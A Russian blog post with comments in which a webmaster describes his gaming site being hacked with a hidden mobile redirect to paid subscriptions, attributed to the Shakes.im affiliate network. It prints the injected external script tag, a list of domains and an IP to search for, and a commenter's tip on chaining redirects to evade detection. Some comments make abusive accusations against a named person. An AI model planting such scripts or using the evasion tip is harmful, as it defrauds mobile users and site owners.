Главная / SEO практика / Shakes.im — партнерка которая убивает
shakes-im-черная-партнерка

Shakes.im — партнерка которая убивает

«Безупречная репутация — первое, что необходимо мошеннику.»
Агата Кристи

Эта история про взлом хорошего сайта, поиске взломщика и отмороженной парнтерке Shakes.im, которая всех прикрыла, которая замела все следы и которая показала свое истинное лицо.

Первый раз — случайность, второй — совпадение, третий — закономерность. Именно эту фразу можно смело вставить в статью, ведь так на самом деле и получилось. Мой сайт был третьим, а может и больше, по взлому и установке жесткого редиректа вышеупомянутой ПП. Партнерка довольно молодая и возможно не все еще заметили их вредоносный код на своем сайте, но я уже обнаружил два известных в интернете случая, в которых была интересная проблема, идентичная моей — взлом сайта и код Шакес.им

Взлом сайта

В конце августа 2015 года, мы с партнером заметили одну интересную вещь — был утрачен доступ к нашему root сервера, на котором были все сайты. На протяжении четырех лет сайтостроительства, нас взламывали не один раз, но чтобы потерять доступ к ISP менеджеру сервера — было первый раз. Я не знаю как взломщик получил доступ, но проверив все сайты, мы увидели, что ничего опасного нет, сайты работают, базы пользователей в интернете на продаже не нашлись. Подумали, может глюк, может еще что-то. Мы полностью переустановили ISP и еще раз проверили сайты на вирусы. Ничего.

В середине сентября сайт фильтрует Яндекс, упали все позиции на 20-25 пунктов. После нескольких часов поиска по сайту, ничего не обнаружили, подумали что это глюки у Яндекса. Отправили пару писем Платону, но нормального ответа так и не дождались. Забили на Яндекс.

Как падал яндекс

Все шло хорошо, трафик на сайте игровой тематики был на уровне 40000-45000 в сутки и в основном мобильный трафик. Сайт полностью белый, все новости и статьи на сайте писались лично нами, никаких черных и серых партнерок, все по белому. Всю душу вкладывали в него.

Но в конце октября что-то пошло не так. 27 октября наш сайт полностью выпал из индекса Google. Ни позиций, ни индексации, даже весь кеш сайта из Гугла не возможно было достать. Спустя сутки пришло сообщение в панель вебмастеров Google:

«На сайте обнаружена маскировка или скрытая переадресация»

Бан от гугла

И тут начались поиски кода редиректа. Заходя через wi-fi соединение с мобильных телефонов, планшетов и тому подобное — ничего не происходило. Проверка всех файлов всеми возможными антивирусами, тоже не дали результатов. Нашумевший сканер вирусов на сайтах AI-Bolit, так же ничего не показал. Или Гугл издевается, или действительно что-то не так.

Спустя некоторое время, я проанализировал сайт на загрузку всех элементов кода с помощью инспектора сайта от Google Chrome и вот что удалось найти:

код партнерки shakes.im

Загружался скрипт из скрипта. Скинув все файлы сайта на ПК я проверил их на наличие этого кода. Вот что удалось найти:

Поиск файлов с кодом

Что скрывает Shakes.im?

Естественно после обнаружения этого вредоносного кода, я начал искать, что же это такое. Первое что попалось на глаза, это мобильная партнерка shakes.im. Думал, да не, не может этого быть. Зарегистрировался в ней и проверил, какие же урлы они выдают своим вебмастерам. И вот:

урлы в партнерке шакесим с вредоносным кодом

Потом я обнаружил, что коды с поддоменом js — это JavaScript редирект, который больше похож на тот, который был на моем сайте:

Java scritp shakes.im редирект код

Вредоносный код, который был на моем сайте имеет струкруту: <script type=»text/javascript» src=»http:// js.shakes.tf/js/pFGw/sub1/sub2/sub3/sub4/»></script>

Домен TF, указывает на офферы по Играм. Все сходится.

Дальше начал искать как бороться с этим вирус и взломом. Нашел еще два сайта:

Техподдержка - Gooффgle Chrome

 

Сайт взломан Шакесим код

Эпидемия взломов от партнерки Shakes.im? Ну конечно нет. Взламывают же плохие вебмастера, чтобы заработать деньги. Подумал я.

А что делает партнерка, чтобы таких взломов не было? Как она обеспечивает себе безупречную репутацию?

На их сайте прямо указано:

правила работы Шакесим

4 пункт — Запрещен трафик со взломанных сайтов. Ну этот пункт можно понять, от куда модераторы знают, взломан сайт или нет, от куда идет траф или нет? Или же все таки должен знать и как то проверять источники если слив идет напрямую, без шифрования урла, без особых ухищрений как скрыть код?

А вот же, 5 пункт — с сайтов без наличия письма согласия. Естественно на моем сайте никаких таких писем и правил не было. Такс, смотрим правила по письмам (клик по картинке, чтобы прочитать полностью):

Правила операторов для Шакесим

А что же ждет партнерку, которая нарушает это правило?

«Нарушение правил оператора, как правило влечет за собой блокировку потока и штраф 200 000 руб»

Какие могут быть добавлены источники в ПП? Смотрим скрин из ПП:

источники шакес

Что происходит после добавления сайта? Правильно, модерация. Как мог взломанный сайт пройти модерацию, если не было ни письма согласия оператора, и ничего другого на сервере, а только вредоносный код редиректа? Чья тут вина?

UPD. 4.11.2015

Вот скриншот, как добавляются сайты в партнерку (клик по картинке):

модерация источника

Ничего из вышеперечисленного не было выполнено. Как модераторы пропустили сайт? Тут уже прямая вина ПП.

Общение с Shakes.im

Обратился я в саппорт ПП с просьбой дать информацию по их пользователю, который имеет id pFGw, с какого числа он начал лить трафик с моего сайта, и всю остальную информацию для дальнейшего заявления в Полицию. В зависимости от суммы заработка зависел пункт из 272 статьи УКРФ. Первое обращение в саппорт было 28 октября. Запомните это число и дальнейшие слова.

Первым делом саппорт Шакесим сказал, что всю информацию они с радостью предоставят. Потом написали, что в данный момент трафик по этому потоку не поступает и якобы они в шоке, ведь на сайте должно быть письмо правил оператора. Якобы такого не может быть. Затем они согласились и сказали, что да, трафик начал литься в августе. Я настаивал на том, чтобы они предоставили информацию, но в ответ было только — подождите, подождите, проверяем.

Через пять часов, они ответили, что «давно заблокировали этого пользователя, и как показывает практика такие люди придумывают всевозможны ухищрения чтобы не палиться перед партнеркой». «Вообщем конкретно по вебмастеру информации дать не можем, т.к не имеем на это право.»

Т.е. дать информацию, которая у них есть нет права, а не проверять источники трафика и письма согласия для операторов — у них есть права?

В поисках правды

Почему мы не могли обнаружить код?

Скрипт ПП очень интересен тем, что в принципе на сайте ничего не происходит, когда он стоит. Антивирусы его не могли определить, потому что он ничего и не делал. Ну скрипт как скрипт, таких десятки на сайте. А суть этого редиректа в том, что он активировался только по определенным IP и определенным операторам связи. Т.е. можно было обнаружить редирект только тогда, когда заходишь через GPRS на сайт с мобильного телефона определенного оператора сотовой связи. Затем происходил редирект на какую-то страницу ПП, где была автоматическая подписка абонента стоимостью от 10 рублей (по моей тематике, но я думаю что это 24 рубля). И каждый день были ребилы (повторное списание средств с телефона) на протяжении нескольких суток, а то и дольше. Т.е. кол-во заработанных денег может перевалить за 5-ти значное число.

Сколько времени висел код на сайте?

По совету одного друга, я проверил статистику сайта по операторам связи. Он сказал, где падает трафик с определенного оператора, там и начал работать редирект. И вот что удалось найти:

статистика по операторам связи

Оператор Мегафон, резко просел трафик с 23 августа. 21 октября все наладилось. Выходит, что код партнерки shakes.im перенаправлял трафик с моего сайта на подписки Мегафона с 23 августа по 21 октября, а это 61 день. За это количество дней было 1 501 392 уникальных пользователей на сайте среди которого 94% это мобильный трафик.

Когда был забанен профиль в партнерке?

Теперь вспоминаем разговор с саппортом. Действительно 28 октября поток был выключен, а вот забанен он был максимум 21 октября. Т.е. все 61 день партнерка принимала трафик и получала заработок, и не важно, был забанен пользователь или нет, но поток работал, а они должны были его в первую очередь забанить. Он перестал работать лишь 21 октября, а про код мы узнали только 28 октября. В итоге имеем, что партнерка шакесим, возможно и была в курсе взлома сайта (да конечно была, ведь правила не были соблюдены полностью), но абсолютно ничего не предпринимала до 21 октября 2015 года и продолжала зарабатывать.

Почему партнерка Шакес.им так долго отвечала?

Мое предположение то, что партнерка Шекесим напрямую связаны с этим взломом, или хотя-бы с этим пользователем. Ведь по сути сама ПП нарушила же свои пункты, и по крайней мере 61 день не удосужилась все перепроверить. Больше 5 часов отвечать на элементарные вопросы, зачем так долго, и в итоге ничего не ответить. За это время можно все данные аккаунта потереть. Также, чтобы избежать штрафов от операторов, они начали заметать следы. Все возможные попытки связаться и разобраться по этому вопросу игнорировались и сопровождались отмороженными ответами.

Как проверить свой сайт на заражение кодом от Shakes.im?

Все очень просто, чтобы немного обезопасить себя, проверьте все файлы вашего сайта на наличие текстовых связок:

  • shakes
  • shakes.tf
  • shakes-im.biz
  • shakes-im.net
  • shakes-im.org
  • shakes-im.com
  • 212.224.118.120

Поставьте какой нибудь мониторщик на сайт, который сможет проверять изменение в коде и в js скриптах. Да и это может вас и не спасти, всегда в плюсе из этой ситуации выходит Оператор, Партнерка и сам мошенник, которые все вместе зарабатывают на вашем горе. А на белых вебмастеров всем остальным наплевать. Как показала эта история.

Я хотел решить эту проблему нормально, не вынося ее за пределы личных разговоров, но мои просьбы были проигнорированы, и практически ничего мне не предоставив Шакесим начали жать на тормоза, делая вид, что ничего страшного не произошло. Они сказали мне только имейл этого мошенника, но я думаю, что он выдуманный.

Почему «партнерка которая убивает»? Потому, что эта партнерка убила сайт своим кодом, партнерка убила надежду на справедливость, не предоставив требуемых данных и фактов, партнерка убила в себе саму себя, не соблюдая свои же правила, партнерка убила хорошее слово о своей репутации.

Спасибо, не уважаемой партнерке Shakes.im, спасибо мошеннику и взломщику сайтов, которого прикрыла шакесим, спасибо всем, кто участвовал в этой истории. Это еще не конец.

Конец

to be continued…

31 комментарий

  1. «Забили на Яндекс» — очень зря. В таких ситуациях надо всё проверять и перепроверять по 100 раз, так как ломают очень часто и очень много, зарабатывая на этом огромные деньги. Пока в регулярную практику не войдёт в РФ «посадка» таких умников в места не столь отдалённые, так и будут пользоваться вседозволенностью.

    • Да я уже потом понял, что Яндекс быстрее его обнаружил. Наверное из-за частого взлома именно у нас в СНГ. Ну никак не мог его обнаружить. Объяснил по тексту почему.

      • На одном дыхании прочитал статью и, возможно, не заметил, поэтому, на всякий случай, спрошу: сервер у кого держите?

  2. С редиректом мобильных пользователей через js тоже сталкивался. При чем как появился код — так и не выяснил (все сайты на ВП и на одном хостинге, но код был только на двоих, на них же много пдагинов, вероятно плагин и виновник). Но код был вставлен в статьи, а не в файлы, поэтому удалял его через замену в БД.
    А вообще, очень грустно все это… Тратишь дни, месяцы и даже годы создавая классный и полезный сайт даже не нагружая его рекламой, а в итоге какое-то что взламывает его и наживается на твоем труде, да еще с такими последствиями…

  3. Еще бы им)) Выключать денежный насос, с чего бы. Такое сплошь и повсюду

  4. Размести историю в крупнейших пабликах по арбитражу, типа кинга. Больше шума и публичности. Пусть научатся отвечать за свои действия !

  5. расшарил у себя в паблике, советую закинуть в дайджест блогосферы на мауле и вебмастерс
    p.s. Забыл пароль от дискуса) sarkazm

  6. Выбросил ссылку в их топик на серче, посмотрим, как прокомментируют

    • Ничего не ответят или попросят модераторов удалить урл. Все равно спасибо больше.

      • Ну там модераторы урлы по запросам пользователей не трут, вроде. Если потрут, то сразу станет ясно ху из ху.

  7. Ирина Сергеева

    да там основатель пп пидр Егор, он кидал уже не раз, ублюдок

  8. Ирина Сергеева

    почему мой комментарий про Егора удаляется???

  9. Ирина Сергеева

    Партнерка Егора! пусть он горит в аду!!! он кинул меня и мою семью(мы вебмастера) на 21234 тыс рублей !!!

  10. Вот эта истооория. По-хорошему, пусть это «умница-хакер» платит тот самый пресловутый штраф и не партнерке, а вам.

  11. Мда, история что надо…. Посмотрим чем закончится

  12. Я владелец Арбитражного паблика. увидел вашу статью. даже не вериться что они могут так прикрывать мошенников. по ощущения отличные ребята знаком с ними лично

    • По отзывам знакомых ребята хорошие, и все говорили что они умеют разруливать ситуацию.
      Но по факту что-то пошло не так.

  13. шакес и так обосрацца? Не верю 🙂 Даже при том что я….. 😉

  14. Так в итоге удалось восстановить потерянные позиции сайта после удаления кода? Что Платоны пишут?

  15. стандартная история после взлома и причем первыми поисковики дают сигнал, владельцы могут долго не замечать. на клиентском сайте 2 года появляются партнерки и вирусы, но никто выводы не хочет делать

    расшарил

  16. Партнерка понравилась стабильностью и отлаженностью
    работы, кроме того сразу выкупают все подписки, даже те что тут же отписались.
    Одна из немногих по-настоящему надежных ПП.

    • Стабильно и отлажено работает со взломщиками и великолепно закрывают глаза на нарушения своих же правил. Да знаем

  17. Кто знает откуда вебмастер льет?
    Никто никого не прикрывает, допустим я беру линк, говорю что лью с гугла а сам наливаю со взломанного сайта, хер кто когда догодается.
    Если бы взломщики были по умней они бы двойной-тройной редирект ебанули и никто бы никогда не догадался куда трафик уходит)
    А так по сути это ваш промах, что у вас нашлась уязвимость)

    • Вы наверное так внимательно читали статью, что мне даже не хочется отправить вас в пункт, где идет модерация источника трафика именно этой партнерки.

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *